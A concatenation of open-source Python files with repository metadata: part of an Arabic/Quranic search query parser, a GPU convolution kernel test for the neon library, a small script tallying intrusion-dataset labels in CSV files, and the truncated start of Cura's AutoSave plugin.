) def make_synonyms( self, fieldname, text ): return self.Synonyms( fieldname, text ) def make_antonyms( self, fieldname, text ): return self.Antonyms( fieldname, text ) def make_derivation( self, fieldname, text, level ): return self.Derivation( fieldname, text, level ) def make_spellerrors( self, fieldname, text ): return self.SpellErrors( fieldname, text ) def make_tashkil( self, fieldname, words ): words = [word for word in words if word[0] not in " \t\r\n"] if len( words ):return self.Tashkil( fieldname, words ) else :return NullQuery def make_tuple( self, fieldname, items ): return self.Tuple( fieldname, items ) def make_wildcard( self, fieldname, text ): field = self._field( fieldname ) if fieldname else None if field: text = self.get_term_text( field, text, tokenize = False, removestops = False ) return self.Wildcard( fieldname, text ) def make_prefix( self, fieldname, text ): field = self._field( fieldname ) if field: text = self.get_term_text( field, text, tokenize = False, removestops = False ) return self.Prefix( fieldname, text ) class QMultiTerm( MultiTerm ): """ basic class """ def _words( self, ixreader ): fieldname = self.fieldname return [ word for word in self.words \ if ( fieldname, word ) in ixreader ] def __unicode__( self ): return u"%s:<%s>" % ( self.fieldname, self.text ) def __repr__( self ): return "%s(%r, %r, boost=%r)" % ( self.__class__.__name__, self.fieldname, self.text, self.boost ) def _all_terms( self, termset, phrases = True ): for word in self.words: termset.add( ( self.fieldname, word ) ) def _existing_terms( self, ixreader, termset, reverse = False, phrases = True ): fieldname, words = self.fieldname, self.words fieldnum = ixreader.fieldname_to_num( fieldname ) for word in words: contains = ( fieldnum, word ) in ixreader if reverse: contains = not contains if contains: termset.add( ( fieldname, word ) ) class FuzzyAll( QMultiTerm ): """ do all possible operations to make a fuzzy search - Synonyms - root derivation - spell - tashkil """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.pipeline( self.fieldname, self.text ) def pipeline( self, fieldname, text ): words = set() words |= set( ArabicParser.Synonyms( fieldname, text ).words ) words |= set( ArabicParser.Derivation( fieldname, text ).words ) return list( words ) class Synonyms( QMultiTerm ): """ query that automatically searches for synonyms of the given word in the same field. """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.synonyms( self.text ) @staticmethod def synonyms( word ): """ TODO find an arabic synonyms thesaurus """ return [word] class Antonyms( QMultiTerm ): """ query that automatically searches for antonyms of the given word in the same field. """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.antonyms( self.text ) @staticmethod def antonyms( word ): """ TODO find an arabic antonyms thesaurus """ return [word] class Derivation( QMultiTerm ): """ query that automatically searches for derivations of the given word in the same field. """ def __init__( self, fieldname, text, level = 0, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = self.derivation( self.text, level ) @staticmethod def derivation( word, leveldist ): """ TODO find a good specific stemmer for arabic language, manipulate at least tow levels of stemming root,lemma """ return [word] class SpellErrors( QMultiTerm ): """ query that ignores the spell errors of arabic letters such as: - ta' marbuta and ha' - alef maqsura and ya' - hamza forms """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost self.words = [text] self.ASF = QArabicSymbolsFilter( shaping = True, tashkil = False, spellerrors = True, hamza = True ) def _words( self, ixreader ): for field, indexed_text in ixreader.all_terms(): if field == self.fieldname: if self._compare( self.text, indexed_text ): yield indexed_text def _compare( self, first, second ): """ normalize and compare """ if first[:2] == u"مو": print first eqiv = ( self.ASF.normalize_all( first ) == self.ASF.normalize_all( second ) ) if eqiv: self.words.append( second ) return eqiv class Tashkil( QMultiTerm ): """ query that automatically searches for different tashkil of words of the given word in the same field. """ def __init__( self, fieldname, text, boost = 1.0 ): self.fieldname = fieldname self.text = text self.boost = boost ASF = QArabicSymbolsFilter( shaping = False, tashkil = True, spellerrors = False, hamza = False ) self.words = [ASF.normalize_all( word ) for word in text] def _words( self, ixreader ): for field, indexed_text in ixreader.all_terms(): if field == self.fieldname: for word in self.text: if self._compare( word, indexed_text ): yield indexed_text def _compare( self, first, second ): """ normalize and compare """ word1 = unicode_( first ) word2 = unicode_( second ) eqiv = ( word1 == word2 ) if eqiv: self.words.append( second ) return eqiv class Tuple( QMultiTerm ): """ query that automatically searches for different words that have the same root*pattern*type of the given word in the same field. """ def __init__( self, fieldname, items, boost = 1.0 ): self.fieldname = fieldname self.props = self._properties( items ) self.text = "(" + ",".join( items ) + ")" self.boost = boost self.words = self.tuple( self.props ) def _properties( self, items ): """ convert list of properties to a dictionary """ l = len( items ) if l >= 0: D = {} if l >= 1: D["test"] = items[0] if l >= 2: pass # add new props return D @staticmethod def tuple( props ): """ search the words that have some specific properties TODO find an arabic analyzer that can suggest a word properties """ return [] class Wildcard( whoosh_Wildcard ): """customize the wildcards for arabic symbols """ def __init__( self, fieldname, text, boost = 1.0 ): new_text = text.replace( u"؟", u"?" ) super( ArabicParser.Wildcard, self ).__init__( fieldname, new_text, boost ) class QuranicParser( ArabicParser ): """a customized query parser for Quran""" def __init__( self, schema, mainfield = "aya", otherfields = [], termclass = Term, ara2eng = ara2eng_names ): super( QuranicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) class FuzzyAll( ArabicParser.FuzzyAll ): """ specific for quran """ def pipeline( self, fieldname, text ): words = set() words |= set( QuranicParser.Synonyms( fieldname, text ).words ) words |= set( QuranicParser.Derivation( fieldname, text, level = 1 ).words ) return list( words ) class Synonyms( ArabicParser.Synonyms ): """ query that automatically searches for synonyms of the given word in the same field.specific for qur'an """ @staticmethod def synonyms( word ): if syndict.has_key( word ): return syndict[word] else: return [word] if FEEDBACK: raise FeedBack( table = "synonyms", value = word ) class Antonyms( ArabicParser.Antonyms ): """ query that automatically searches for antonyms of the given word in the same field. """ @staticmethod def antonyms( word ): if antdict.has_key( word ): return antdict[word] else: return [word] if FEEDBACK: raise FeedBack( table = "antonyms", value = word ) class Derivation( ArabicParser.Derivation ): """ specific for quran """ @staticmethod def derivation( word, leveldist ): """ search in defined field """ # define source level index if word in derivedict["word_"]: indexsrc = "word_" elif word in derivedict["lemma"]: indexsrc = "lemma" elif word in derivedict["root"]: indexsrc = "root" else: indexsrc = None # warning # define destination level index if leveldist == 0: indexdist = "word_" elif leveldist == 1: indexdist = "lemma" elif leveldist == 2: indexdist = "root" else: indexdist = "root" # new levels lst = [] if indexsrc: # if index source level is defined itm = LOCATE( derivedict[indexsrc], derivedict[indexdist], word ) if itm: # if different of none lst = FILTER_DOUBLES( FIND( derivedict[indexdist], derivedict["word_"], itm ) ) else: lst = [word] return lst class Tuple( ArabicParser.Tuple ): """ query that automatically searches for different words that have the same root*pattern*type of the given word in the same field. """ def _properties( self, items ): """ convert list of prop"rties to a dictionary """ l = len( items ) if l >= 0: D = {} if l >= 1: D["root"] = items[0] if l >= 2: D["type"] = items[1] if l >= 3: D["pattern"] = items[2] if l >= 4: pass # new properties return D @staticmethod def tuple( props ): """ search the words that have the specific properties """ wset = set() firsttime = True for propkey in props.keys(): if worddict.has_key( propkey ): partial_wset = set( FIND( worddict[propkey], worddict["word_"], props[propkey] ) ) if firsttime: wset = partial_wset;firsttime = False else: wset &= partial_wset else: # property has now index pass return list( wset ) class Wildcard( ArabicParser.Wildcard, ArabicParser.QMultiTerm ): """ customize the wildcards for highlight """ def __init__( self, fieldname, text, boost = 1.0 ): self.words = [] new_text = text.replace( u"؟", u"?" ) super( QuranicParser.Wildcard, self ).__init__( fieldname, new_text, boost ) def _words( self, ixreader ): if self.prefix: candidates = ixreader.expand_prefix( self.fieldname, self.prefix ) else: candidates = ixreader.lexicon( self.fieldname ) exp = self.expression for text in candidates: if exp.match( text ): self.words.append( text ) yield text def normalize( self ): # If there are no wildcard characters in this "wildcard", # turn it into a simple Term. text = self.text if text == "*": return Every( boost = self.boost ) if "*" not in text and "?" not in text: # If no wildcard chars, convert to a normal term. return Term( self.fieldname, self.text, boost = self.boost ) elif ( "?" not in text and text.endswith( "*" ) and text.find( "*" ) == len( text ) - 1 and ( len( text ) < 2 or text[-2] != "\\" ) ): # If the only wildcard char is an asterisk at the end, convert to a # Prefix query. return QuranicParser.Prefix( self.fieldname, self.text[:-1], boost = self.boost ) else: return self class Prefix( whoosh_Prefix, ArabicParser.QMultiTerm ): """customize Prefix for highlight """ def __init__( self, fieldname, text, boost = 1.0 ): self.words = [] super( QuranicParser.Prefix, self ).__init__( fieldname, text, boost ) def _words( self, ixreader ): tt = ixreader.termtable fieldid = ixreader.schema.to_number( self.fieldname ) for fn, t in tt.keys_from( ( fieldid, self.text ) ): if fn != fieldid or not t.startswith( self.text ): return self.words.append( t ) yield t class SuperFuzzyAll( QuranicParser.FuzzyAll ): """ specific for quran search with all possible forms of the word """ def pipeline( self, fieldname, text ): words = set() words |= set( QuranicParser.Synonyms( fieldname, text ).words ) words |= set( QuranicParser.Derivation( fieldname, text, level = 1 ).words ) if len( words ) == 1: wildcarded_text = " ".join( map( lambda x: "*" + x + "*", text.split( " " ) ) ) words |= set( QuranicParser.Wildcard( fieldname, wildcarded_text ).words ) return list( words ) class FuzzyQuranicParser( QuranicParser ): """a customized query parser that respects Quranic properties""" def __init__( self, schema, mainfield = "aya", otherfields = [], termclass = SuperFuzzyAll, ara2eng = ara2eng_names ): super( FuzzyQuranicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) self.fieldnames = [mainfield] + otherfields def _make( self, methodname, fieldname, *args ): method = getattr( super( FuzzyQuranicParser, self ), methodname ) if fieldname is None: return Or( [method( fn, *args ) for fn in self.fieldnames] ) else: return method( fieldname, *args ) def make_term( self, fieldname, text ): return self._make( "make_term", fieldname, text ) def make_range( self, fieldname, start, end, startexcl, endexcl ): return self._make( "make_range", fieldname, start, end, startexcl, endexcl ) def make_wildcard( self, fieldname, text ): return self._make( "make_wildcard", fieldname, text ) def make_phrase( self, fieldname, text ): return self._make( "make_phrase", fieldname, text )
agpl-3.0
matthijsvk/multimodalSR
code/Experiments/neon-master/neon/backends/conv_kernel_test.py
1
18713
#!/usr/bin/env python # Copyright 2016 Nervana Systems Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division from builtins import str import numpy as np import pycuda.driver as drv from neon import logger as neon_logger from neon.backends.nervanagpu import NervanaGPU from neon.backends.nervanacpu import NervanaCPU from neon.backends.convolution import (_ceil_div, FpropCuda, BpropCuda, UpdateCuda, FpropDirect, BpropDirect, UpdateDirect) from neon.backends.winograd_conv import ( FpropWinograd_2x2_3x3, BpropWinograd_2x2_3x3, UpdateWinograd_3x3_2x2, FpropWinograd_4x4_3x3, BpropWinograd_4x4_3x3, UpdateWinograd_3x3_4x4, FpropWinograd_2x2_5x5, BpropWinograd_2x2_5x5) fprop_kernels = (FpropCuda, FpropDirect, FpropWinograd_2x2_3x3, FpropWinograd_4x4_3x3, FpropWinograd_2x2_5x5) bprop_kernels = (BpropCuda, BpropDirect, BpropWinograd_2x2_3x3, BpropWinograd_4x4_3x3, BpropWinograd_2x2_5x5) update_kernels = (UpdateCuda, UpdateDirect, UpdateWinograd_3x3_2x2, UpdateWinograd_3x3_4x4) ng = NervanaGPU(0) nc = NervanaCPU() neon_logger.display(drv.Context.get_current().get_device().name()) out = 0 ones = 0 # D, H, W, T, R, S, pad, str conv_1x1 = ( 1, 14, 14, 1, 1, 1, 0,0,0, 1,1,1) conv_3x3 = ( 1, 14, 14, 1, 3, 3, 0,1,1, 1,1,1) conv_3x3p0 = ( 1, 14, 14, 1, 3, 3, 0,0,0, 1,1,1) conv_3x3p2 = ( 1, 14, 14, 1, 3, 3, 0,2,2, 1,1,1) conv_3x3s2 = ( 1, 14, 14, 1, 3, 3, 0,1,1, 1,2,2) conv_1x3 = ( 1, 14, 14, 1, 1, 3, 0,0,1, 1,1,1) conv_3x1 = ( 1, 14, 14, 1, 3, 1, 0,1,0, 1,1,1) conv_5x5 = ( 1, 14, 14, 1, 5, 5, 0,2,2, 1,1,1) conv_11x11s4 = ( 1, 224, 224, 1,11,11, 0,2,2, 1,4,4) conv_1x1x1 = ( 7, 7, 7, 1, 1, 1, 0,0,0, 1,1,1) conv_3x3x3 = ( 7, 7, 7, 3, 3, 3, 1,1,1, 1,1,1) conv_3x3x3s2 = ( 7, 7, 7, 3, 3, 3, 1,1,1, 2,2,2) conv_3x3L = ( 1, 200, 200, 1, 3, 3, 0,1,1, 1,1,1) conv_1D = ( 1, 13, 3263, 1,13,11, 0,0,0, 1,1,3) # configs = [ # ] configs = [ # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (BpropCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateCuda, 32, 32, 32, True, True, None, (conv_3x3,) ), (FpropCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (BpropCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (UpdateCuda, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5) ), (FpropCuda, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (UpdateCuda, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 32, 32, 64, True, True, None, (conv_3x3,conv_3x3L) ), (BpropDirect, 32, 64, 32, True, True, None, (conv_3x3,conv_3x3L) ), (UpdateDirect, 32, 32, 32, True, True, None, (conv_3x3,conv_3x3L) ), (UpdateDirect, 32, 32, 32, False, True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 32, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 32, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (UpdateDirect, 32, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 32, 3, 64, True, False, None, (conv_11x11s4,) ), (UpdateDirect, 32, 3, 32, True, False, None, (conv_11x11s4,) ), (FpropDirect, 32, 64, 128, True, True, None, (conv_3x3,) ), (FpropDirect, 32, 32, 63, True, True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 32, 32, 1, True, True, None, (conv_3x3,conv_3x3L) ), (FpropDirect, 16, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 8, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 4, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 2, 32, 64, True, False, None, (conv_3x3,) ), (FpropDirect, 1, 32, 64, True, True, None, (conv_3x3,) ), (UpdateDirect, 16, 32, 63, True, False, None, (conv_3x3,) ), (UpdateDirect, 8, 32, 64, True, False, None, (conv_3x3,) ), (UpdateDirect, 4, 32, 128, True, False, None, (conv_3x3,) ), (FpropDirect, 32, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 16, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 8, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 4, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 2, 1, 512, True, False, None, (conv_1D,) ), (FpropDirect, 1, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 32, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 16, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 8, 1, 512, True, False, None, (conv_1D,) ), (UpdateDirect, 4, 1, 512, True, False, None, (conv_1D,) ), # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropDirect, 64, 32, 64, True, True, None, (conv_3x3,) ), (FpropDirect, 64, 32, 128, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 32, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 64, True, True, None, (conv_3x3,) ), (FpropDirect, 128, 32, 128, True, True, None, (conv_3x3,) ), (BpropDirect, 64, 64, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 64, 128, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 32, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 64, 32, True, True, None, (conv_3x3,) ), (BpropDirect, 128, 128, 32, True, True, None, (conv_3x3,) ), (FpropDirect, 64, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 64, 32, 128, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 64, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 128, 32, 128, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 64, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 64, 128, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 32, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 64, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (BpropDirect, 128, 128, 32, True, False, None, (conv_1x1, conv_3x3s2, conv_1x3, conv_3x1, conv_5x5, conv_3x3x3, conv_1x1x1, conv_3x3x3s2) ), (FpropDirect, 64, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 64, 3, 128, True, False, None, (conv_11x11s4,) ), (FpropDirect, 128, 3, 32, True, False, None, (conv_11x11s4,) ), (FpropDirect, 128, 3, 64, True, False, None, (conv_11x11s4,) ), (FpropDirect, 64, 33, 56, True, True, None, (conv_3x3s2,) ), (FpropDirect, 64, 33, 120, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 56, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 120, True, True, None, (conv_3x3s2,) ), (FpropDirect, 128, 33, 248, True, True, None, (conv_3x3s2,) ), # Kernel N, C, K Determ Cmpnd Xtern, conv (FpropWinograd_2x2_3x3, 32, 32, 32, True, True, False, (conv_3x3,conv_3x3L) ), (FpropWinograd_2x2_3x3, 32, 32, 32, True, True, True, (conv_3x3,) ), (BpropWinograd_2x2_3x3, 32, 32, 32, True, True, False, (conv_3x3,conv_3x3L) ), (BpropWinograd_2x2_3x3, 32, 32, 32, True, True, True, (conv_3x3,) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, False, True, None, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, True, False, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, True, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, True, False, (conv_3x3,) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, True, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, True, True, None, (conv_3x3,) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, False, True, None, (conv_3x3,) ), (FpropWinograd_2x2_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (BpropWinograd_2x2_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (UpdateWinograd_3x3_2x2, 32, 32, 32, True, False, None, (conv_3x3p0,conv_3x3p2) ), (FpropWinograd_4x4_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (BpropWinograd_4x4_3x3, 32, 32, 32, True, False, True, (conv_3x3p0,conv_3x3p2) ), (UpdateWinograd_3x3_4x4, 32, 32, 32, True, False, None, (conv_3x3p0,conv_3x3p2) ), (FpropWinograd_2x2_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_2x2_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_2x2, 1, 63, 63, True, False, None, (conv_3x3,) ), (FpropWinograd_4x4_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (BpropWinograd_4x4_3x3, 1, 63, 63, True, False, True, (conv_3x3,conv_3x3L) ), (UpdateWinograd_3x3_4x4, 1, 63, 63, True, False, None, (conv_3x3,) ), (FpropWinograd_2x2_5x5, 32, 32, 32, False, True, None, (conv_5x5,) ), (BpropWinograd_2x2_5x5, 32, 32, 32, False, True, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 32, 64, 192, False, False, None, (conv_5x5,) ), (BpropWinograd_2x2_5x5, 32, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 16, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 8, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 4, 64, 192, False, False, None, (conv_5x5,) ), (FpropWinograd_2x2_5x5, 2, 64, 192, False, False, None, (conv_5x5,) ), ] fprop_opts = [ dict(), dict(slope=0.0, relu=True), dict(slope=0.1, relu=True), dict(bias=True), dict(bias=True, slope=0.0, relu=True), dict(bias=True, slope=0.1, relu=True), dict(bsum=True), ] bprop_opts = [ dict(), dict(X=True, slope=0.0, brelu=True), dict(X=True, slope=0.1, brelu=True), dict(X=True, bsum=True, slope=0.0, brelu=True), dict(X=True, bsum=True, slope=0.1, brelu=True), dict(X=True, alpha=2.0, beta=3.0), dict(alpha=2.0, beta=3.0), ] update_opts = [ dict(alpha=2.0, beta=3.0), dict(), ] for config in configs: kernelClass, N, C, K, determ, compound, override, convs = config for conv in convs: D, H, W, T, R, S, pad_d, pad_h, pad_w, str_d, str_h, str_w = conv ng.deterministic = determ layer = nc.conv_layer(np.float64, N, C, K, D, H, W, T, R, S, pad_d, pad_h, pad_w, str_d, str_h, str_w) (M, P, Q) = layer.MPQ if kernelClass in (FpropCuda, BpropCuda, UpdateCuda): dtypes = (np.float32,) else: dtypes = (np.float32, np.float16) for dtype in (dtypes): ng.scratch_buffer_reset() if override is None: kernel = kernelClass(ng, np.dtype(dtype), N, C, K, D, H, W, T, R, S, M, P, Q, pad_d, pad_h, pad_w, str_d, str_h, str_w) else: kernel = kernelClass(ng, np.dtype(dtype), N, C, K, D, H, W, T, R, S, M, P, Q, pad_d, pad_h, pad_w, str_d, str_h, str_w, override) neon_logger.display(kernel) back = False if kernelClass in fprop_kernels: dimI1 = layer.dimI dimI2 = layer.dimF dimO = layer.dimO opts = fprop_opts func = layer.xprop_conv elif kernelClass in bprop_kernels: dimI1 = layer.dimO dimI2 = layer.dimF dimO = layer.dimI opts = bprop_opts func = layer.xprop_conv back = True elif kernelClass in update_kernels: dimI1 = layer.dimI dimI2 = layer.dimO dimO = layer.dimF opts = update_opts func = layer.update_conv else: raise TypeError("Unknown Kernel Class") if not compound: opts = [ dict() ] if ones: vals = 1.0 else: vals = (0.5 - ng.rand()) * 2 devI1 = ng.empty(dimI1, dtype=dtype) devI2 = ng.empty(dimI2, dtype=dtype) devO = ng.empty(dimO, dtype=dtype) devI1[:] = vals devI2[:] = vals devO[:] = vals cpuI1 = nc.array(devI1.get(), dtype=np.float64) cpuI2 = nc.array(devI2.get(), dtype=np.float64) cpuO = nc.array(devO.get(), dtype=np.float64) if compound and opts is not update_opts: devB = ng.empty((dimO[0], 1), dtype=np.float32) devS = ng.empty((dimO[0], 1), dtype=np.float32) devB[:] = vals devS[:] = vals cpuB = nc.array(devB.get(), dtype=np.float64) cpuS = nc.array(devS.get(), dtype=np.float64) if opts is bprop_opts: devX = ng.empty(dimO, dtype=dtype) devX[:] = vals cpuX = nc.array(devX.get(), dtype=np.float64) for opt in opts: dev_opts = dict(opt) cpu_opts = dict(opt) if back: cpu_opts["backward"] = True if "bias" in dev_opts: dev_opts["bias"] = devB cpu_opts["bias"] = cpuB if "bsum" in dev_opts: dev_opts["bsum"] = devS cpu_opts["bsum"] = cpuS if "X" in dev_opts: dev_opts["X"] = devX cpu_opts["X"] = cpuX kernel.bind_params(devI1, devI2, devO, **dev_opts) kernel.execute() func(cpuI1, cpuI2, cpuO, **cpu_opts) devA = devO.get() cpuA = cpuO._tensor difA = cpuA - devA if out: np.savetxt("out.txt", difA.reshape((-1,dimO[-1])), fmt='%6.3f') np.savetxt("outC.txt", cpuA.reshape((-1,dimO[-1])), fmt='%6.3f') np.savetxt("outD.txt", devA.reshape((-1,dimO[-1])), fmt='%6.3f') maxval = abs(cpuA).max() maxdif = abs(difA).max() ratio = maxdif / maxval if "bsum" in dev_opts: devZ = devS.get() cpuZ = cpuS._tensor difZ = abs(cpuZ - devZ) / abs(cpuZ).max() ratio2 = difZ.max() #print difZ # def output_slice(p, P, B): # p0 = p * B # p1 = p0 + B # if p1 > P: # p1 = P # return slice(p0, p1) # B = 4 # Yw = _ceil_div(P, B) # Xw = _ceil_div(Q, B) # bsum = np.empty((K, Yw, Xw)) # for y in range(Yw): # pSlice = output_slice(y, P, B) # for x in range(Xw): # qSlice = output_slice(x, Q, B) # for k in range(K): # bsum[k,y,x] = np.sum(cpuA[k,0,pSlice,qSlice,:]) # bsum = bsum.reshape((K,-1)) # np.savetxt("outC.txt", bsum, fmt='%6.1f') # np.savetxt("outD.txt", kernel.bsum.ary, fmt='%6.1f') # np.savetxt("out.txt", abs(bsum - kernel.bsum.ary), fmt='%6.1f') #print abs(devZ - np.sum(kernel.bsum.ary, axis=1, keepdims=True)) else: ratio2 = 0.0 bad = ratio > 0.01 or ratio2 > 0.01 if bad: neon_logger.display("=================FAIL==============") neon_logger.display("%17.12f %17.12f %s" % (ratio, ratio2, str(opt))) if bad: exit() devI1 = devI2 = devO = devB = devS = devX = None cpuI1 = cpuI2 = cpuO = cpuB = cpuS = cpuX = None
mit
starqiu/PythonLearn
dispdis2.py
1
1671
import csv csvfile1=file('simpl.csv','rb') fin1=csv.reader(csvfile1) label_dict={'back.':0,'buffer_overflow.':1,'ftp_write.':2,'guess_passwd.':3,'imap.':4,'ipsweep.':5,'land.':6,'loadmodule.':7, 'multihop.':8,'neptune.':9,'nmap.':10,'normal.':11,'perl.':12,'phf.':13,'pod.':14,'portsweep.':15,'rootkit.':16, 'satan.':17,'smurf.':18,'spy.':19,'teardrop.':20,'warezclient.':21,'warezmaster.':22} line1=input("please input num1:") line2=input("please input num2:") list1=[] list2=[] def read_spec_lines(line1,line2): csvfile=file('dispresult.csv','rb') fin=csv.reader(csvfile) global list1 global list2 for index,line in enumerate(fin): if index==line1: list1=line elif index==line2: list2=line break read_spec_lines(line1,line2) print "the list1 is:",list1 print print "the list2 is:",list2 print result2=[[],[],[],[],[],[],[],[],[],[]] for line in fin1: for i in range(len(line)): result2[i].append(line[i]) #print result2 #init temp row ,for store each row temp_row=[0 for i in range(23)] #print temp_row result3 = [] for row_index in range(9): for col_index,col in enumerate(result2[row_index]): #print "list1[row_index] ",list1[row_index] if list1[row_index] == col : label = result2[9][col_index] #print label label_index = label_dict[label] #print label_index #print temp_row[label_index] temp_row[label_index] += 1 #print temp_row[label_index] #print temp_row result3.append(temp_row) temp_row=[0 for i in range(23)] print result3
gpl-2.0
totalretribution/Cura
plugins/AutoSave/AutoSave.py
6
2018
# Copyright (c) 2016 Ultimaker B.V. # Cura is released under the terms of the AGPLv3 or higher. from PyQt5.QtCore import QTimer from UM.Extension import Extension from UM.Preferences import Preferences from UM.Application import Application from UM.Resources import Resources from UM.Logger import Logger class AutoSave(Extension): def __init__(self): super().__init__() Preferences.getInstance().preferenceChanged.connect(self._triggerTimer) self._global_stack = None Application.getInstance().globalContainerStackChanged.connect(self._onGlobalStackChanged) self._onGlobalStackChanged() Preferences.getInstance().addPreference("cura/autosave_delay", 1000 * 10) self._change_timer = QTimer() self._change_timer.setInterval(Preferences.getInstance().getValue("cura/autosave_delay")) self._change_timer.setSingleShot(True) self._change_timer.timeout.connect(self._onTimeout) self._saving = False def _triggerTimer(self, *args): if not self._saving: self._change_timer.start() def _onGlobalStackChanged(self): if self._global_stack: self._global_stack.propertyChanged.disconnect(self._triggerTimer) self._global_stack.containersChanged.disconnect(self._triggerTimer) self._global_stack = Application.getInstance().getGlobalContainerStack() if self._global_stack: self._global_stack.propertyChanged.connect(self._triggerTimer) self._global_stack.containersChanged.connect(self._triggerTimer) def _onTimeout(self): self._saving = True # To prevent the save process from triggering another autosave. Logger.log("d", "Autosaving preferences, instances and profiles") Application.getInstance().saveSettings() Preferences.getInstance().writeToFile(Resources.getStoragePath(Resources.Preferences, 